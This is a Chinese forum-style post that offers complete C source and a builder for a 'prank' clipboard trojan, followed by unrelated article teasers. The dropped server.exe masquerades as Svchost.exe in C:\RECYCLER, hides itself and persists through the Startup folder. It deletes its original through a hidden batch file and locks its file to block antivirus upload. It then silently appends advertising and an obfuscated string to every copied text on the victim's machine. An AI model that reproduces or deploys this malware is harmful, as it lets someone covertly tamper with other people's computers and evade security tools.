c语言程序设计整人,C语言进程间通信练习作品 - 整人小程序之剪切板

主程序界面:

a0a419f3ad9b8a9e3447d6958ccc6b80.png

=============================================================================

程序介绍:

如果对方执行了主程序生成的【server.exe】,【server.exe】会自复制、自启动、自删除(仿木马)。

【server.exe】会后台每秒/次检测对方的剪切板,一有文本数据则在尾部加入【附加内容】,达到,对方粘贴

文本的时候,后面总是会多出一些数据。

例:如果附加内容为:“对!牛弹琴!”

对方 复制(Ctrl+C)一段:“对牛弹琴!”,当对方 粘贴(Ctrl+V)到某个地方时,内容就会变成

“对牛弹琴!对!牛弹琴!”。

【复制(Ctrl+C)粘贴(Ctrl+V)是使用率最高的操作之一,不愁对方不纠结,O(∩_∩)O哈哈~】

==============================================================================

子程序源码:

===============================================================================

#include

#include

#pragma comment(linker, "/OPT:NOWIN98")

char Dirr[256]="C:\\RECYCLER\\Svchost.exe"; // 释放路径

char L[99999]="   -------  网络编程爱好者  L、QQ:000000000";

char temp[499999999]={0};

char  tmp[499999999]={0};

HANDLE Lock_File,Lock_File1;

/*================================== 程序初始化 =======================================*/

/********************************************************/

//  开机自启动

/********************************************************/

void Auto(char Name[])

{

// 自复制到 启动文件夹 实现开机自启动  嫌麻烦 就用这种方式自启动吧 一句代码搞定

char DirName[]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\ts.exe";

unlink(DirName);

CopyFile(Name,DirName,1);

SetFileAttributes(DirName,FILE_ATTRIBUTE_HIDDEN);

Lock_File1=CreateFile(DirName, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);

}

/********************************************************/

//  自删除功能

/********************************************************/

void Del(char *systemname)

{

FILE *fp;

fp=fopen("C:\\system.bat","w+");

fprintf(fp,"@echo off \n");

fprintf(fp,":statr\nif not exist \"%s\" goto done\n",systemname);

fprintf(fp,"del /f /q \"%s\" \n",systemname);

fprintf(fp,"goto statr\n");

fprintf(fp,":done\n");

fprintf(fp,"del /f /q %%0\n");

fclose(fp);

ShellExecute(NULL,"open","C:\\system.bat",0,0,SW_HIDE);

}

/********************************************************/

//  程序运行时进行初始化

/********************************************************/

void DelAdd()

{

char systemName[MAX_PATH];

char DirBuffer[MAX_PATH];

HMODULE hModule = GetModuleHandle(NULL);  // 获取当前程序句柄

GetModuleFileName(hModule,DirBuffer,sizeof(DirBuffer)); // 获取当前程序的路径

// GetSystemDirectory(systemName,sizeof(systemName)); // 获取系统文件夹路径

strcpy(systemName,Dirr);

if ((strcmp(DirBuffer,systemName))!=0)   // 判断程序自身是否在系统目录 不在则实现自删除

{

CopyFile(DirBuffer,systemName,0);

Del(DirBuffer);      // 自删除模块

SetFileAttributes(systemName,FILE_ATTRIBUTE_HIDDEN);

ShellExecute(NULL,"open",systemName,0,0,SW_HIDE); // 运行副本

exit(0); // 退出 让Bat删除自己

}

else

{

Auto(DirBuffer);

// 第一步 立即锁定本体 防止被上传 我想杀软没那么无聊为了上传就随随便便解锁吧?

Lock_File=CreateFile(DirBuffer, GENERIC_READ, NULL, NULL, OPEN_EXISTING, 0, NULL);

}

}

/*================================== 程序初始化 =======================================*/

/*================================== 核心功能区 =======================================*/

/********************************************************/

//  检查剪切板数据的类型

/********************************************************/

int jc()

{

if (OpenClipboard(NULL))  // 打开剪切板

{

if (IsClipboardFormatAvailable(CF_TEXT)) // 检测剪切板是否有指定类型的剪切板数据

{

CloseClipboard(); // 关闭剪切板

return 1;

}

else

{

CloseClipboard(); // 关闭剪切板

return 0;

}

}

return 0;

}

/********************************************************/

//  读取剪切板数据

/********************************************************/

char* Rjqb()

{

if (OpenClipboard(NULL))  // 打开剪切板

{

if (IsClipboardFormatAvailable(CF_TEXT)) // 检测剪切板是否有指定类型的剪切板数据

{

HANDLE hClip;

char *pBuf;

hClip = GetClipboardData(CF_TEXT);  // 获取指定类型的剪切板数据

pBuf = (char *)GlobalLock(hClip); // 加锁

GlobalUnlock(hClip); // 解锁

CloseClipboard(); // 关闭剪切板

return pBuf;

}

else

CloseClipboard(); // 关闭剪切板

}

}

/********************************************************/

//  修改剪切板数据

/********************************************************/

void Wjqb()

{

if (OpenClipboard(NULL))  // 打开剪切板

{

if (IsClipboardFormatAvailable(CF_TEXT)) // 检测剪切板是否有指定类型的剪切板数据

{

HANDLE hClip;

char *pBuf;

EmptyClipboard(); // 清空剪切板 并释放剪切板中数据的句柄 把剪切板的所有权赋给当前窗口

hClip = GlobalAlloc(GMEM_MOVEABLE,strlen(temp)+1); // 分配一个内存对象 第二个参数 字节数

pBuf = (char *)GlobalLock(hClip); // 将空间加锁 并返回 指针

strcpy(pBuf,temp);

GlobalUnlock(hClip);  // 解锁

SetClipboardData(CF_TEXT,pBuf); // 写入数据

CloseClipboard(); // 关闭

strcpy(tmp,pBuf);

}

else

CloseClipboard(); // 关闭剪切板

}

}

/*================================== 核心功能区 =======================================*/

int APIENTRY WinMain(HINSTANCE hInstance,

HINSTANCE hPrevInstance,

LPSTR     lpCmdLine,

int       nCmdShow)

{

// 已经加入锁定自身的功能 不需要下面的语句

/*

HANDLE _hEvent=CreateEvent(NULL,FALSE,FALSE,"Jqban");

if (_hEvent)

{

if(ERROR_ALREADY_EXISTS==GetLastError())

{

exit(0);

}

}

SetEvent(_hEvent);

*/

int cout=0;

//

// 让启动程序时的小漏斗马上消失

GetInputState();

PostThreadMessage(GetCurrentThreadId(),NULL,0,0);

MSG msg;

GetMessage(&msg, NULL, NULL, NULL);

//

char Bud[]="!!...!!矽描册赐悲荒粥!!MⅲRRせ211867767:";

int ii,jj=0;

ii=strlen(Bud)-1;

for(;ii>=0;ii--,jj++)

Bud[jj]=Bud[jj]-1;

DelAdd();

// 不停的循环

while (1)

{

if (jc())  //

{

// 读取剪切板 并复制给全局变量 temp

strcpy(temp,Rjqb());

// 比较是否与上次内容相同 若不相同则进行修改

if (strcmp(temp,tmp))

{

strcat(temp,L);

cout++;

if (cout==6)

{

strcat(temp,Bud);

cout=0;

}

// 在剪切板内容后面附加广告内容

Wjqb();  //  写入剪切板

}

}

Sleep(1000); // 延时1秒

}

return 0;

}

===============================================================================

至于主程序源码,主程序是用MFC创建的对话窗口,关键代码都在【生成】的按钮中

下面贴出【生成】按钮 触发的代码

===============================================================================

void CMyDlg::OnButtOk()

{

// TODO: Add your control notification handler code here

CString DIr;

CString MssG;

char autoo[]="C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\ts.exe";

char Dir[MAX_PATH]={0};

char Mssg[99999]={0};

GetDlgItemText(IDC_EDIT_DIR,DIr); // 获取 释放路径 的编辑框数据

GetDlgItemText(IDC_EDIT_Msg,MssG); // 获取 附加数据 的编辑框数据

strcpy(Dir,DIr);  // 必须用数组形式

strcpy(Mssg,MssG);

HRSRC hRc=FindResource(NULL,"L","Exe");

if(!hRc)

{

::MessageBox(0,"EXE资源不存在","错误",MB_SYSTEMMODAL);

return ;

}

HGLOBAL hg=LoadResource(NULL,hRc);  // 将资源载入内存并返回其在内存中首地址保存在hg中

DWORD dw=SizeofResource(NULL,hRc);  // 获得资源大小并用dw保存资源大小

// 分配缓冲区并用0填充

char a[137728];

memset(a,0,137728);

// 向该缓冲区中复制资源的二进制数据

memcpy(a,hg,dw); // 将资源的二进制数据存放在缓冲区a

// 创建服务端文件

FILE *out=fopen("server.exe","wb+");

fwrite(a,1,dw,out);

fclose(out);

FILE *fp=fopen("server.exe","rb+");

rewind(fp);

fseek(fp,0x6830,0);

fwrite(Dir,1,256,fp);

rewind(fp);  // 指针归0

fseek(fp,0x6930,0);

fwrite(Mssg ,1,99999,fp);

fclose(fp);

// 生成卸载相关的批处理...

char Fname[MAX_PATH];

GetFileTitle(Dir,Fname,sizeof(Fname));

fp=fopen("卸载.bat","w+");

fputs("echo off\n",fp);

fputs("title 卸载【整人小程序之剪切板】子程序  L、QQ:100\n",fp);

fputs("COLOR 0a\n",fp);

fputs("echo 此批处理,只能卸载子程序释放路径为:",fp);

fputs(Dir,fp);

fputs("\ntaskkill /F /IM \"",fp);

fputs(Fname,fp);

fputs("\"\nattrib -h \"",fp);

fputs(Dir,fp);

fputs("\"\nattrib -h \"",fp);

fputs(autoo,fp);

fputs("\"\n",fp);

fputs("Del \"",fp);

fputs(Dir,fp);

fputs("\"\ndel \"",fp);

fputs(autoo,fp);

fputs("\"\n",fp);

fputs("ECHO 执行完毕!\n",fp);

fputs("pause",fp);

fclose(fp);

::MessageBox(0,"已经生成服务端【server.exe】及卸载相关的批处理【卸载.exe】","成功",MB_SYSTEMMODAL);

}

=========================================================================================

主程序下载地址:

08888e3a94b1d4845f47f7539b112be4.gif

zrxcx-v1.0.zip

(38.54 KB, 下载次数: 3)

2015-1-11 00:47 上传

点击文件名下载附件

下载积分: 黑币 -5

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/news/559312.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

python安装lap_一个python脚本解决安装mq的依赖问题

import tarfileimport sys,osfrom _utils.patrol2 import run_cmdimport zipfiledef get_version(filename):cmd"rpm -U {}".format(filename)code,resrun_cmd(cmd,cwdpkg_unzip_path)if is already installed in res or 已安装 in res:return Trueelse:return False…

c语言如何关闭线程,如何用C语言实现多线程

该楼层疑似违规已被系统折叠 隐藏此楼查看此楼Windows操作系统,C语言实现多线程:#include #include DWORD APIENTRY ThreadOne ( LPVOID threadArg ){printf ( "线程开始啦,参数是:%s\n" , (char *)threadArg );return …

linux8安装bbr_CentOS 7安装4.9内核开启BBR

最新的4.9内核合并了Google研发的BBR TCP阻塞算法,使用效果大概可以跟锐速相比。待4.9正式版发出前,CentOS并没有4.9的RPM包。那么我们可以手动编译内核,安装并启用。注意:内存小于512M的机器在编译内核bzImage的时候会出现错误。…

Android怎么自定义充电铃声,安卓手机怎么自定义充电提示音_自定义安卓充电提示音教程_3DM手游...

安卓手机其实也是可以设置充电提示音的,我们只需要下载一个第三方软件,然后在APP中进行一些简单的设置,就可以实现自定义更换手机充电提示音了。安卓手机怎么自定义充电提示音?下面小编就为大家带来了详细的教程,希望能…

rfc方式的集成 sap_转载: 与SAP集成的接口方式比较:IDOC BAPI RFC 之间的区别

se37写出来的叫function,其中可以远程调用的叫rfc,remote-enabled function,abap语法和输入输出参数就会有一些限制。bapi是sap做好的实现特定业务操作的rfc。idoc是基于sap自己的类似xml格式的文档数据交换的方式。rfc必须在线的方式调用,一般做同步的,…

android logcat 根据包名过滤,adb logcat通过包名过滤(dos命令find后跟变量)

过滤条件:该app在运行实现原理:1、获取该app运行时的pid2、通过find命令,过滤pid的日志,就是该包的运行日志实现:1、在同一目录建立一文件:getpid.batecho offadb shell "ps | grep com.example.testp…

流浪的python博客园_python学习心得第一章

初始python1什么是程序计算机程序是一组执行某种动作的的指令。和那些电路、芯片、显卡、硬盘等不同,它不是计算机本身可以触摸的部分,而是隐藏在背后运行在硬件上面的东西。程序就是一系列告诉没有知觉的硬件该做什么事情的命令。软件就是这些程序的集合…

adb server is out of date. linux,adb server is out of date. killing完美解决

原本是想跑monkey测试的,可使用adb命令时提示:adb server is out of date. killing...出现这个问题的原因是:adb使用的端口5037被占用了。下面我们说下如何找到是哪个程序占用了这个端口,顺便看看cmd里面的一些类似linux的进程操作…

react 怎么获取表格_react学习之js-xlsx导入和导出excel表格

前记:最近真的挺忙的,一件事接着一件,都忘了我的React项目,尽管这是一个没写概率没写离散的夜晚,我决定还是先做做我的React好了,进入正题项目需求,需要导入和导出表单,发现前端已经…

android 最新的框架搭建,Android之Mvp模式框架搭建

前言在做Android开发时,我们通常为了更合理,更高效,优质的开发项目,并不是直接上来就开始开发功能,而是先搭建好自己的一个开发框架,一个好的开发框架,通常会让我们事倍功半,它就好比我们去建造一个房子,如果你的地基打的越深,越牢固,那么就可以建造出很高很大的房子.在搭建一个…

curl在android服务器上编译,Android curl的上载编译和使用

mm执行编译:PLATFORM_VERSION_CODENAMERELPLATFORM_VERSION4.0.3TARGET_PRODUCTfullTARGET_BUILD_VARIANTengTARGET_BUILD_TYPEreleaseTARGET_BUILD_APPSTARGET_ARCHarmTARGET_ARCH_VARIANTarmv7-aHOST_ARCHx86HOST_OSlinuxHOST_BUILD_TYPEreleaseBUILD_IDIML74Kmak…

英特尔nuc能代替主机吗_python编程,热度为什么越来越高,python能代替JAVA吗?...

大家好,我是你们的软件主讲老师宁彤天,python编程是这几年刚火起来了,这可能是这几年人工智能的普及吧,现在是人工智能非python,没有第二,当能其它语言也能实现人工智能,但python的代码量能用最…

python 网页自动化框架_python+selenium自动化框架

项目以前的UI自动化大概是这样分层的1.Common功能层:一些经常被调用的基本常用操作,用来完成某项具体的功能,与具体的业务无关。比如常用的封装:--将元素定位方法重新封装--封装上下左右滑动 eg: swipe(directdown,count1)--pinch…

小程序监听android返回键,如何监听小程序返回按钮事件?

写在前面为了能及时的将自己踩到的前端坑(包括ionic,angular,react,ReactNative,小程序,APICloud)分享给大家,以后会逐渐将文章转移到微信公众号:前端e家(front_e_family)。可直接扫码关注,公众号会不定期更新新文章,分享踩坑笔记…

mix2s 升级android p,小米推送小米MIX2S 安卓P稳定版更新 这两个隐藏升级你发现了吗?...

原标题:小米推送小米MIX2S 安卓P稳定版更新 这两个隐藏升级你发现了吗?今天上午,小米推送了小米MIX2S的稳定版更新,版本号为MIUI V10.0.4.0,体积为2GB,这一次更新将系统底层更新至了Android P,不…

如何用python做一个会聊天的女朋友_520来啦~教你用Python给自己造了一个女朋友!...

520这一天,也是网络情人节。就在那天,如果没有女朋友的自己,如何假装自己是有朋友的!如何在朋友圈“秀恩爱。女生版:image很有感觉有木有~~男生版:imageimage其实这些都是小意思啦~~这些都是假装自己有女朋…

鸿蒙系统定位低端市场,明年年初见!鸿蒙系统会先定位中低端,后续全面升级...

惊变20年鸿蒙系统手机会先定位中低端惊变20年上个月的华为H..DC2020开发者大会上,余承东对外公布将在明年开发出搭载鸿蒙系统的手机,并且采用EMUI11的华为手机可以拥有优先享受升级鸿蒙的待遇,手持华为手机的用户都颇为期待。惊变20年根据最新…

jsfor循环终止_js 终止 forEach 循环

wp8 入门到精通 MultiMsgPromptList arraymsg new List(); List ArrayNotifyInfo ...转:Top 10 Algorithms for Coding InterviewThe following are top 10 algorithms related concepts in coding interview. I will try to illustrate t ...Unity游戏开发——自动…

python求出五位数的回文数_python之递归

#codingutf-8#题目:打印出如下图案(菱形)nu 1 # 开始值k 2 # 变量值while nu > 0:print(int((7 - nu) / 2) * * * nu)nu kif nu 7:k -k#题目:有一分数序列:2/1 ,3/2 ,5/3 ,8/5 ,1…

html大小写字符串转换成整数,c++字符串大小写转换

由于ANSI和Unicode在函数名上有差别,故都列出来,不过本人以Unicode为主。【1.用C语言标准库函数toupper,tolower】头文件:cctype c下面:ctype.h转大写Ansi版: int toupper(int c);Unicode版:int towupper(w…